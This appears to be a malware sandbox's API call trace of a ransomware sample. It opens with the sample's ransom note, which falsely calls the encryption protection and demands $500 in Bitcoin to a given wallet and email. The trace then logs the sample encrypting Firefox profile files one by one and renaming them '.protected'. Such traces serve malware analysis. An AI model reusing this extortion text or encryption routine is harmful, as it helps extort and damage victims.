SYSTEM SECURITY ALERT !\r\n-----------------------------------------------------------------------------\r\nYour SERVER was tried to be attacked by an outsider.\r\nImmediatly change your password, use a minimum of 8 characters in length.\r\n-----------------------------------------------------------------------------\r\n\r\nAll your personal files was encrypted with RSA public key (1024 bit) to SAVE them from a third party persons. \r\nNow they are ENCRYPTED and SAFE!\r\n\r\nTo RESTORE all your files back immediatly, follow this few simple steps:\r\n\r\n1) Our SECURE-SERVER service charge a payment for file decryption and preventing damage of your SERVER by 3th party persons;\r\n2) After your SUCCESSFUL payment, write us an E-MAIL with your unique SERVER-ID and payment ID;\r\n3) Receive an DECRYPTION TOOL from us back to your E-MAIL;\r\n4) Run the tool on your SERVER and safe-decrypt all your files back to NORMAL state.\r\n\r\nWe STRONGLY RECOMMEND you NOT to use any other decryption tool, files will be LOST!\r\n\r\nWe guarantee:\r\n\r\n100% Successful restoring all of your files\r\n100% Satisfaction guarantee\r\n100% Safe and secure service\r\n\r\n------------------------------------------------------------------------------\r\n\r\nOur E-MAIL: secureserver@memeware.net\r\nPayment type: Bitcoin\r\nSum: $500\r\nOur wallet: 1CfMU2eKnajfpnYvLbWR3m7jZRXujtx8Cm\r\nYour SERVER-ID:\r\n") returned 1341 [0090.444] WriteFile (in: hFile=0x14c, lpBuffer=0xf01390*, nNumberOfBytesToWrite=0x53d, lpNumberOfBytesWritten=0x295e7b4, lpOverlapped=0x0 | out: lpBuffer=0xf01390*, lpNumberOfBytesWritten=0x295e7b4*=0x53d, lpOverlapped=0x0) returned 1 [0090.444] lstrlenA (lpString="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") returned 684 [0090.444] WriteFile (in: hFile=0x14c, lpBuffer=0x447448*, nNumberOfBytesToWrite=0x2ac, lpNumberOfBytesWritten=0x295e7b4, lpOverlapped=0x0 | out: lpBuffer=0x447448*, lpNumberOfBytesWritten=0x295e7b4*=0x2ac, lpOverlapped=0x0) returned 1 
[0090.444] lstrlenA (lpString="\r\n------------------------------------------------------------------------------\r\nFor any questions, write us: secureserver@memeware.net\r\nMEMEWARE SECURE-SERVER SYSTEMS (c) 2018") returned 177 [0090.444] WriteFile (in: hFile=0x14c, lpBuffer=0xf018d0*, nNumberOfBytesToWrite=0xb1, lpNumberOfBytesWritten=0x295e7b4, lpOverlapped=0x0 | out: lpBuffer=0xf018d0*, lpNumberOfBytesWritten=0x295e7b4*=0xb1, lpOverlapped=0x0) returned 1 [0090.445] CloseHandle (hObject=0x14c) returned 1 [0090.445] FindNextFileW (in: hFindFile=0x47ba50, lpFindFileData=0x295ea40 | out: lpFindFileData=0x295ea40) returned 1 [0090.445] lstrcmpiW (lpString1="Profiles", lpString2="Windows") returned -1 [0090.445] lstrcmpiW (lpString1="Profiles", lpString2="Program Files") returned -1 [0090.445] lstrcmpiW (lpString1="Profiles", lpString2="Program Files (x86)") returned -1 [0090.445] lstrcmpiW (lpString1="Profiles", lpString2="$Recycle.bin") returned 1 [0090.445] lstrcmpiW (lpString1="Profiles", lpString2="System Volume Information") returned -1 [0090.445] wnsprintfW (in: pszDest=0x4cfb68, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles") returned 74 [0090.445] lstrcmpW (lpString1="Profiles", lpString2=".") returned 1 [0090.445] lstrcmpW (lpString1="Profiles", lpString2="..") returned 1 [0090.446] wnsprintfW (in: pszDest=0x4dfbb0, cchDest=32767, pszFmt="%s\\*" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\*") returned 76 [0090.446] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\*", lpFindFileData=0x295e7d0 | out: lpFindFileData=0x295e7d0) returned 0x47ba90 [0090.446] lstrcmpiW (lpString1=".", lpString2="Windows") returned -1 [0090.446] lstrcmpiW (lpString1=".", lpString2="Program Files") returned -1 [0090.446] lstrcmpiW (lpString1=".", lpString2="Program Files 
(x86)") returned -1 [0090.446] lstrcmpiW (lpString1=".", lpString2="$Recycle.bin") returned 1 [0090.446] lstrcmpiW (lpString1=".", lpString2="System Volume Information") returned -1 [0090.446] wnsprintfW (in: pszDest=0x4dfbb0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\.") returned 76 [0090.446] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0090.446] FindNextFileW (in: hFindFile=0x47ba90, lpFindFileData=0x295e7d0 | out: lpFindFileData=0x295e7d0) returned 1 [0090.447] lstrcmpiW (lpString1="..", lpString2="Windows") returned -1 [0090.447] lstrcmpiW (lpString1="..", lpString2="Program Files") returned -1 [0090.447] lstrcmpiW (lpString1="..", lpString2="Program Files (x86)") returned -1 [0090.447] lstrcmpiW (lpString1="..", lpString2="$Recycle.bin") returned 1 [0090.447] lstrcmpiW (lpString1="..", lpString2="System Volume Information") returned -1 [0090.447] wnsprintfW (in: pszDest=0x4dfbb0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\..") returned 77 [0090.447] lstrcmpW (lpString1="..", lpString2=".") returned 1 [0090.447] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0090.447] FindNextFileW (in: hFindFile=0x47ba90, lpFindFileData=0x295e7d0 | out: lpFindFileData=0x295e7d0) returned 1 [0090.447] lstrcmpiW (lpString1="silmbjec.default", lpString2="Windows") returned -1 [0090.447] lstrcmpiW (lpString1="silmbjec.default", lpString2="Program Files") returned 1 [0090.447] lstrcmpiW (lpString1="silmbjec.default", lpString2="Program Files (x86)") returned 1 [0090.447] lstrcmpiW (lpString1="silmbjec.default", lpString2="$Recycle.bin") returned 1 [0090.447] lstrcmpiW (lpString1="silmbjec.default", lpString2="System Volume Information") returned -1 [0090.447] wnsprintfW (in: pszDest=0x4dfbb0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS 
HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\silmbjec.default") returned 91 [0090.447] lstrcmpW (lpString1="silmbjec.default", lpString2=".") returned 1 [0090.447] lstrcmpW (lpString1="silmbjec.default", lpString2="..") returned 1 [0090.447] wnsprintfW (in: pszDest=0x4f3bf8, cchDest=32767, pszFmt="%s\\*" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\*") returned 93 [0090.447] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\*", lpFindFileData=0x295e560 | out: lpFindFileData=0x295e560) returned 0x47bad0 [0090.459] lstrcmpiW (lpString1=".", lpString2="Windows") returned -1 [0090.459] lstrcmpiW (lpString1=".", lpString2="Program Files") returned -1 [0090.459] lstrcmpiW (lpString1=".", lpString2="Program Files (x86)") returned -1 [0090.459] lstrcmpiW (lpString1=".", lpString2="$Recycle.bin") returned 1 [0090.459] lstrcmpiW (lpString1=".", lpString2="System Volume Information") returned -1 [0090.459] wnsprintfW (in: pszDest=0x4f3bf8, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\.") returned 93 [0090.459] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0090.459] FindNextFileW (in: hFindFile=0x47bad0, lpFindFileData=0x295e560 | out: lpFindFileData=0x295e560) returned 1 [0090.461] lstrcmpiW (lpString1="..", lpString2="Windows") returned -1 [0090.461] lstrcmpiW (lpString1="..", lpString2="Program Files") returned -1 [0090.461] lstrcmpiW (lpString1="..", lpString2="Program Files (x86)") returned -1 [0090.461] lstrcmpiW (lpString1="..", lpString2="$Recycle.bin") returned 1 [0090.461] lstrcmpiW (lpString1="..", lpString2="System Volume Information") returned -1 [0090.461] wnsprintfW (in: pszDest=0x4f3bf8, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS 
HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\..") returned 94 [0090.461] lstrcmpW (lpString1="..", lpString2=".") returned 1 [0090.461] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0090.461] FindNextFileW (in: hFindFile=0x47bad0, lpFindFileData=0x295e560 | out: lpFindFileData=0x295e560) returned 1 [0090.461] lstrcmpiW (lpString1="addons.json", lpString2="Windows") returned -1 [0090.461] lstrcmpiW (lpString1="addons.json", lpString2="Program Files") returned -1 [0090.461] lstrcmpiW (lpString1="addons.json", lpString2="Program Files (x86)") returned -1 [0090.461] lstrcmpiW (lpString1="addons.json", lpString2="$Recycle.bin") returned 1 [0090.461] lstrcmpiW (lpString1="addons.json", lpString2="System Volume Information") returned -1 [0090.461] wnsprintfW (in: pszDest=0x4f3bf8, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\addons.json") returned 103 [0090.461] StrStrIW (lpFirst="addons.json", lpSrch=".protected") returned 0x0 [0090.461] lstrcmpW (lpString1="addons.json", lpString2="RESTORE_FILES.txt") returned -1 [0090.461] CryptGenRandom (in: hProv=0x444d38, dwLen=0x20, pbBuffer=0x295e4fc | out: pbBuffer=0x295e4fc) returned 1 [0090.461] CryptEncrypt (in: hKey=0x444cf8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x48ea38*, pdwDataLen=0x295e524*=0x20, dwBufLen=0x30 | out: pbData=0x48ea38*, pdwDataLen=0x295e524*=0x30) returned 1 [0090.461] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\addons.json" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\mozilla\\firefox\\profiles\\silmbjec.default\\addons.json"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x154 [0090.462] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS 
HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\addons.json") returned 103 [0090.462] StrStrW (lpFirst="addons.json", lpSrch=".txt") returned 0x0 [0090.462] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\addons.json") returned 103 [0090.462] StrStrW (lpFirst="addons.json", lpSrch=".rar") returned 0x0 [0090.462] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\addons.json") returned 103 [0090.462] StrStrW (lpFirst="addons.json", lpSrch=".zip") returned 0x0 [0090.462] ReadFile (in: hFile=0x154, lpBuffer=0x503c40, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x295e544, lpOverlapped=0x0 | out: lpBuffer=0x503c40*, lpNumberOfBytesRead=0x295e544*=0x18, lpOverlapped=0x0) returned 1 [0090.463] SetFilePointerEx (in: hFile=0x154, liDistanceToMove=0xffffffe8, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0090.463] WriteFile (in: hFile=0x154, lpBuffer=0x503c40*, nNumberOfBytesToWrite=0x18, lpNumberOfBytesWritten=0x295e544, lpOverlapped=0x0 | out: lpBuffer=0x503c40*, lpNumberOfBytesWritten=0x295e544*=0x18, lpOverlapped=0x0) returned 1 [0090.463] SetFilePointerEx (in: hFile=0x154, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0090.463] WriteFile (in: hFile=0x154, lpBuffer=0x295e51c*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x295e544, lpOverlapped=0x0 | out: lpBuffer=0x295e51c*, lpNumberOfBytesWritten=0x295e544*=0x4, lpOverlapped=0x0) returned 1 [0090.463] WriteFile (in: hFile=0x154, lpBuffer=0x48ea38*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x295e544, lpOverlapped=0x0 | out: lpBuffer=0x48ea38*, lpNumberOfBytesWritten=0x295e544*=0x30, lpOverlapped=0x0) returned 1 [0090.463] CloseHandle (hObject=0x154) returned 1 [0090.463] wnsprintfW (in: pszDest=0x503c40, cchDest=32767, 
pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\addons.json.protected") returned 113 [0090.463] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\addons.json" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\mozilla\\firefox\\profiles\\silmbjec.default\\addons.json"), lpNewFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\addons.json.protected" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\mozilla\\firefox\\profiles\\silmbjec.default\\addons.json.protected")) returned 1 [0090.464] FindNextFileW (in: hFindFile=0x47bad0, lpFindFileData=0x295e560 | out: lpFindFileData=0x295e560) returned 1 [0090.464] lstrcmpiW (lpString1="bookmarkbackups", lpString2="Windows") returned -1 [0090.464] lstrcmpiW (lpString1="bookmarkbackups", lpString2="Program Files") returned -1 [0090.464] lstrcmpiW (lpString1="bookmarkbackups", lpString2="Program Files (x86)") returned -1 [0090.464] lstrcmpiW (lpString1="bookmarkbackups", lpString2="$Recycle.bin") returned 1 [0090.464] lstrcmpiW (lpString1="bookmarkbackups", lpString2="System Volume Information") returned -1 [0090.464] wnsprintfW (in: pszDest=0x4f3bf8, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\bookmarkbackups") returned 107 [0090.464] lstrcmpW (lpString1="bookmarkbackups", lpString2=".") returned 1 [0090.464] lstrcmpW (lpString1="bookmarkbackups", lpString2="..") returned 1 [0090.465] wnsprintfW (in: pszDest=0x503c40, cchDest=32767, pszFmt="%s\\*" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\bookmarkbackups\\*") returned 109 [0090.465] FindFirstFileW (in: 
lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\bookmarkbackups\\*", lpFindFileData=0x295e2f0 | out: lpFindFileData=0x295e2f0) returned 0x47bb10 [0090.482] lstrcmpiW (lpString1=".", lpString2="Windows") returned -1 [0090.482] lstrcmpiW (lpString1=".", lpString2="Program Files") returned -1 [0090.482] lstrcmpiW (lpString1=".", lpString2="Program Files (x86)") returned -1 [0090.482] lstrcmpiW (lpString1=".", lpString2="$Recycle.bin") returned 1 [0090.482] lstrcmpiW (lpString1=".", lpString2="System Volume Information") returned -1 [0090.482] wnsprintfW (in: pszDest=0x503c40, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\bookmarkbackups\\.") returned 109 [0090.482] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0090.482] FindNextFileW (in: hFindFile=0x47bb10, lpFindFileData=0x295e2f0 | out: lpFindFileData=0x295e2f0) returned 1 [0090.482] lstrcmpiW (lpString1="..", lpString2="Windows") returned -1 [0090.482] lstrcmpiW (lpString1="..", lpString2="Program Files") returned -1 [0090.482] lstrcmpiW (lpString1="..", lpString2="Program Files (x86)") returned -1 [0090.482] lstrcmpiW (lpString1="..", lpString2="$Recycle.bin") returned 1 [0090.482] lstrcmpiW (lpString1="..", lpString2="System Volume Information") returned -1 [0090.482] wnsprintfW (in: pszDest=0x503c40, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\bookmarkbackups\\..") returned 110 [0090.482] lstrcmpW (lpString1="..", lpString2=".") returned 1 [0090.482] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0090.482] FindNextFileW (in: hFindFile=0x47bb10, lpFindFileData=0x295e2f0 | out: lpFindFileData=0x295e2f0) returned 1 [0090.482] lstrcmpiW (lpString1="bookmarks-2017-06-05_5.json", lpString2="Windows") returned -1 [0090.482] 
lstrcmpiW (lpString1="bookmarks-2017-06-05_5.json", lpString2="Program Files") returned -1 [0090.482] lstrcmpiW (lpString1="bookmarks-2017-06-05_5.json", lpString2="Program Files (x86)") returned -1 [0090.482] lstrcmpiW (lpString1="bookmarks-2017-06-05_5.json", lpString2="$Recycle.bin") returned 1 [0090.482] lstrcmpiW (lpString1="bookmarks-2017-06-05_5.json", lpString2="System Volume Information") returned -1 [0090.482] wnsprintfW (in: pszDest=0x503c40, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\bookmarkbackups\\bookmarks-2017-06-05_5.json") returned 135 [0090.482] StrStrIW (lpFirst="bookmarks-2017-06-05_5.json", lpSrch=".protected") returned 0x0 [0090.482] lstrcmpW (lpString1="bookmarks-2017-06-05_5.json", lpString2="RESTORE_FILES.txt") returned -1 [0090.482] CryptGenRandom (in: hProv=0x444d38, dwLen=0x20, pbBuffer=0x295e28c | out: pbBuffer=0x295e28c) returned 1 [0090.483] CryptEncrypt (in: hKey=0x444cf8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x48ea38*, pdwDataLen=0x295e2b4*=0x20, dwBufLen=0x30 | out: pbData=0x48ea38*, pdwDataLen=0x295e2b4*=0x30) returned 1 [0090.483] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\bookmarkbackups\\bookmarks-2017-06-05_5.json" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\mozilla\\firefox\\profiles\\silmbjec.default\\bookmarkbackups\\bookmarks-2017-06-05_5.json"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x158 [0090.484] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\bookmarkbackups\\bookmarks-2017-06-05_5.json") returned 135 [0090.484] StrStrW (lpFirst="bookmarks-2017-06-05_5.json", lpSrch=".txt") returned 0x0 [0090.484] lstrlenW 
(lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\bookmarkbackups\\bookmarks-2017-06-05_5.json") returned 135 [0090.484] StrStrW (lpFirst="bookmarks-2017-06-05_5.json", lpSrch=".rar") returned 0x0 [0090.484] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\bookmarkbackups\\bookmarks-2017-06-05_5.json") returned 135 [0090.484] StrStrW (lpFirst="bookmarks-2017-06-05_5.json", lpSrch=".zip") returned 0x0 [0090.484] ReadFile (in: hFile=0x158, lpBuffer=0x513c88, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x295e2d4, lpOverlapped=0x0 | out: lpBuffer=0x513c88*, lpNumberOfBytesRead=0x295e2d4*=0xbdb, lpOverlapped=0x0) returned 1 [0090.522] SetFilePointerEx (in: hFile=0x158, liDistanceToMove=0xfffff425, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0090.522] WriteFile (in: hFile=0x158, lpBuffer=0x513c88*, nNumberOfBytesToWrite=0xbdb, lpNumberOfBytesWritten=0x295e2d4, lpOverlapped=0x0 | out: lpBuffer=0x513c88*, lpNumberOfBytesWritten=0x295e2d4*=0xbdb, lpOverlapped=0x0) returned 1 [0090.522] SetFilePointerEx (in: hFile=0x158, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0090.522] WriteFile (in: hFile=0x158, lpBuffer=0x295e2ac*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x295e2d4, lpOverlapped=0x0 | out: lpBuffer=0x295e2ac*, lpNumberOfBytesWritten=0x295e2d4*=0x4, lpOverlapped=0x0) returned 1 [0090.523] WriteFile (in: hFile=0x158, lpBuffer=0x48ea38*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x295e2d4, lpOverlapped=0x0 | out: lpBuffer=0x48ea38*, lpNumberOfBytesWritten=0x295e2d4*=0x30, lpOverlapped=0x0) returned 1 [0090.523] CloseHandle (hObject=0x158) returned 1 [0090.523] wnsprintfW (in: pszDest=0x513c88, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS 
HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\bookmarkbackups\\bookmarks-2017-06-05_5.json.protected") returned 145 [0090.523] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\bookmarkbackups\\bookmarks-2017-06-05_5.json" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\mozilla\\firefox\\profiles\\silmbjec.default\\bookmarkbackups\\bookmarks-2017-06-05_5.json"), lpNewFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\bookmarkbackups\\bookmarks-2017-06-05_5.json.protected" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\mozilla\\firefox\\profiles\\silmbjec.default\\bookmarkbackups\\bookmarks-2017-06-05_5.json.protected")) returned 1 [0090.525] FindNextFileW (in: hFindFile=0x47bb10, lpFindFileData=0x295e2f0 | out: lpFindFileData=0x295e2f0) returned 1 [0090.525] lstrcmpiW (lpString1="bookmarks-2017-06-16_5.json", lpString2="Windows") returned -1 [0090.525] lstrcmpiW (lpString1="bookmarks-2017-06-16_5.json", lpString2="Program Files") returned -1 [0090.525] lstrcmpiW (lpString1="bookmarks-2017-06-16_5.json", lpString2="Program Files (x86)") returned -1 [0090.525] lstrcmpiW (lpString1="bookmarks-2017-06-16_5.json", lpString2="$Recycle.bin") returned 1 [0090.525] lstrcmpiW (lpString1="bookmarks-2017-06-16_5.json", lpString2="System Volume Information") returned -1 [0090.525] wnsprintfW (in: pszDest=0x503c40, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\bookmarkbackups\\bookmarks-2017-06-16_5.json") returned 135 [0090.525] StrStrIW (lpFirst="bookmarks-2017-06-16_5.json", lpSrch=".protected") returned 0x0 [0090.525] lstrcmpW (lpString1="bookmarks-2017-06-16_5.json", lpString2="RESTORE_FILES.txt") returned -1 [0090.525] CryptGenRandom (in: hProv=0x444d38, 
dwLen=0x20, pbBuffer=0x295e28c | out: pbBuffer=0x295e28c) returned 1 [0090.525] CryptEncrypt (in: hKey=0x444cf8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x48ea38*, pdwDataLen=0x295e2b4*=0x20, dwBufLen=0x30 | out: pbData=0x48ea38*, pdwDataLen=0x295e2b4*=0x30) returned 1 [0090.525] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\bookmarkbackups\\bookmarks-2017-06-16_5.json" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\mozilla\\firefox\\profiles\\silmbjec.default\\bookmarkbackups\\bookmarks-2017-06-16_5.json"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x158 [0090.526] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\bookmarkbackups\\bookmarks-2017-06-16_5.json") returned 135 [0090.526] StrStrW (lpFirst="bookmarks-2017-06-16_5.json", lpSrch=".txt") returned 0x0 [0090.526] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\bookmarkbackups\\bookmarks-2017-06-16_5.json") returned 135 [0090.526] StrStrW (lpFirst="bookmarks-2017-06-16_5.json", lpSrch=".rar") returned 0x0 [0090.526] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\bookmarkbackups\\bookmarks-2017-06-16_5.json") returned 135 [0090.526] StrStrW (lpFirst="bookmarks-2017-06-16_5.json", lpSrch=".zip") returned 0x0 [0090.526] ReadFile (in: hFile=0x158, lpBuffer=0x513c88, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x295e2d4, lpOverlapped=0x0 | out: lpBuffer=0x513c88*, lpNumberOfBytesRead=0x295e2d4*=0xbdb, lpOverlapped=0x0) returned 1 [0090.528] SetFilePointerEx (in: hFile=0x158, liDistanceToMove=0xfffff425, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: 
lpNewFilePointer=0xffffffff) returned 1 [0090.528] WriteFile (in: hFile=0x158, lpBuffer=0x513c88*, nNumberOfBytesToWrite=0xbdb, lpNumberOfBytesWritten=0x295e2d4, lpOverlapped=0x0 | out: lpBuffer=0x513c88*, lpNumberOfBytesWritten=0x295e2d4*=0xbdb, lpOverlapped=0x0) returned 1 [0090.528] SetFilePointerEx (in: hFile=0x158, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0090.528] WriteFile (in: hFile=0x158, lpBuffer=0x295e2ac*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x295e2d4, lpOverlapped=0x0 | out: lpBuffer=0x295e2ac*, lpNumberOfBytesWritten=0x295e2d4*=0x4, lpOverlapped=0x0) returned 1 [0090.528] WriteFile (in: hFile=0x158, lpBuffer=0x48ea38*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x295e2d4, lpOverlapped=0x0 | out: lpBuffer=0x48ea38*, lpNumberOfBytesWritten=0x295e2d4*=0x30, lpOverlapped=0x0) returned 1 [0090.529] CloseHandle (hObject=0x158) returned 1 [0090.529] wnsprintfW (in: pszDest=0x513c88, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\bookmarkbackups\\bookmarks-2017-06-16_5.json.protected") returned 145 [0090.529] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\bookmarkbackups\\bookmarks-2017-06-16_5.json" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\mozilla\\firefox\\profiles\\silmbjec.default\\bookmarkbackups\\bookmarks-2017-06-16_5.json"), lpNewFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\bookmarkbackups\\bookmarks-2017-06-16_5.json.protected" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\mozilla\\firefox\\profiles\\silmbjec.default\\bookmarkbackups\\bookmarks-2017-06-16_5.json.protected")) returned 1 [0090.529] FindNextFileW (in: hFindFile=0x47bb10, lpFindFileData=0x295e2f0 | out: 
